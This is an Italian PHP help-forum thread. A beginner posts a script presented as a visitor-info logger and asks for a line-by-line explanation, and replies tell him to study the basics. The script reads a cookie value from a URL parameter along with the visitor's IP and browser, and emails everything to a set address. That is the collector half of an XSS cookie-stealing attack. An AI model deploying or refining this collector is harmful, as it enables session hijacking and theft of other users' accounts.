Visualizzazione dei risultati da 1 a 4 su 4

Discussione: ip e altre info

Utente di HTML.it

ip e altre info

buona sera a tutti,

sto studianto da pochissimo il php , e giarando sul web ho trovato uno scrpt che da molte info sul visitatore che visualizza la pagina (ip ,browser...).

ecco:

codice:
    <?php  $ip = $_SERVER['REMOTE_ADDR'];  $userAgent = $_SERVER['HTTP_USER_AGENT'];  $accept=$_SERVER['HTTP_ACCEPT_LANGUAGE'];  $cookie = $_GET['c'];  $myemail = "tuaemail@email.it";  $today = date("l, F j, Y, g:i a") ;  $subject = "Indirizzo ip" ;  $message = "Eccoti l'indirizzo ip, con tanto di data e ora dell'invio:  Ip: $ip  Cookie: $cookie  Browser: $userAgent  Lingua: $accept  Url: $base  Giorno & Ora : $today \n  ";  $from = "From: $myemail\r\n";  mail($myemail, $subject, $message, $from);  ?>

come ho detto sono ancora all'inizio , quindi vi chiedo se potreste analizzarmi punto per punto il codice facendomi capire a cosa serve.

grazie

p.s. c'è un modo per far che le info me le scriva in un altro foglio php o html invece di mandarmeli in email?

Re: ip e altre info

Originariamente inviato da giovx24
    come ho detto sono ancora all'inizio , quindi vi chiedo se potreste analizzarmi punto per punto il codice facendomi capire a cosa serve.

grazie

p.s. c'è un modo per far che le info me le scriva in un altro foglio php o html invece di mandarmeli in email?
    PRIMA ti devi studiare la guida PHP: QUI

Chiedere di analizzare uno script a qualcuno é una perdita di tempo per 2 motivi:
    1) se non conosci le basi del PHP non ci capiresti niente.
    2) anche se ci capissi qualcosa non sapresti comenandare avanti;

Utente di HTML.it

ok

posso dire di aver già letto la guida per tre volte, più o meno ho capito come funziona....volevo solo un analisi dettagliata

Re: ok

Originariamente inviato da giovx24
    posso dire di aver già letto la guida per tre volte, più o meno ho capito come funziona....volevo solo un analisi dettagliata
    Scusa, ma non ti sembra ovvio?

//Recupera il browser
    $userAgent = $_SERVER['HTTP_USER_AGENT'];

// invia l'informazione recuperata (browser) nell'email
    Browser: $userAgent

Secondo me te la devi rileggere un altro paio di volte

Permessi di invio